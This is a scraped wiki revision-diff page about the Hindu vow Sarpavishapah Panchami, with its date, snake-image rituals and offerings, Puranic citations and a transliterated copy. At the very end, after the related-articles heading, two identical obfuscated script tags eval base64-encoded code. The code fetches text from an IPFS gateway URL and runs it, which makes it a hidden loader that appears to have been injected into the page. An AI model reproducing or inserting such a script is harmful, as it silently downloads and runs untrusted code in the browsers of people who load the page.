Difference between revisions of "सर्पविषापह पंचमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[श्रावण]] [[कृष्ण पक्ष]] की [[पंचमी]] पर सर्पविषापह पंचमी व्रत किया जाता है।
 
*[[श्रावण]] [[कृष्ण पक्ष]] की [[पंचमी]] पर सर्पविषापह पंचमी व्रत किया जाता है।
*द्वार के दोनों ओर [[गोबर]] से [[सर्प|सर्पों]] की आकृति बनाना चाहिए।
+
*द्वार के दोनों ओर गोबर से [[सर्प|सर्पों]] की आकृति बनाना चाहिए।
 
*[[गेहूँ]], [[दूध]], भुने अन्नों, [[दही]], [[दूर्वा]] शाखाओं, [[पुष्प|पुष्पों]] आदि से उनकी पूजा करनी चाहिए।
 
*[[गेहूँ]], [[दूध]], भुने अन्नों, [[दही]], [[दूर्वा]] शाखाओं, [[पुष्प|पुष्पों]] आदि से उनकी पूजा करनी चाहिए।
 
*ऐसी मान्यता है कि सर्पविषापह पंचमी से सर्प प्रसन्न हो जाते हैं व सात पीढ़ियों तक सर्पों का भय नहीं रहता।<ref>हेमाद्रि (व्रत खण्ड 1, 564-565, [[स्कन्द पुराण]] के प्रभास खण्ड से उद्धरण); कृत्यकल्पतरु (94, [[भविष्य पुराण]] 1|32|32-64 से उद्धरण); हेमाद्रि (व्रत खण्ड 1, 564
 
*ऐसी मान्यता है कि सर्पविषापह पंचमी से सर्प प्रसन्न हो जाते हैं व सात पीढ़ियों तक सर्पों का भय नहीं रहता।<ref>हेमाद्रि (व्रत खण्ड 1, 564-565, [[स्कन्द पुराण]] के प्रभास खण्ड से उद्धरण); कृत्यकल्पतरु (94, [[भविष्य पुराण]] 1|32|32-64 से उद्धरण); हेमाद्रि (व्रत खण्ड 1, 564

Latest revision as of 12:56, 14 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan krishna paksh ki panchami par sarpavishapah panchami vrat kiya jata hai.
  • dvar ke donoan or gobar se sarpoan ki akriti banana chahie.
  • gehooan, doodh, bhune annoan, dahi, doorva shakhaoan, pushpoan adi se unaki pooja karani chahie.
  • aisi manyata hai ki sarpavishapah panchami se sarp prasann ho jate haian v sat pidhiyoan tak sarpoan ka bhay nahian rahata.[1]

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 564-565, skand puran ke prabhas khand se uddharan); krityakalpataru (94, bhavishy puran 1|32|32-64 se uddharan); hemadri (vrat khand 1, 564

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>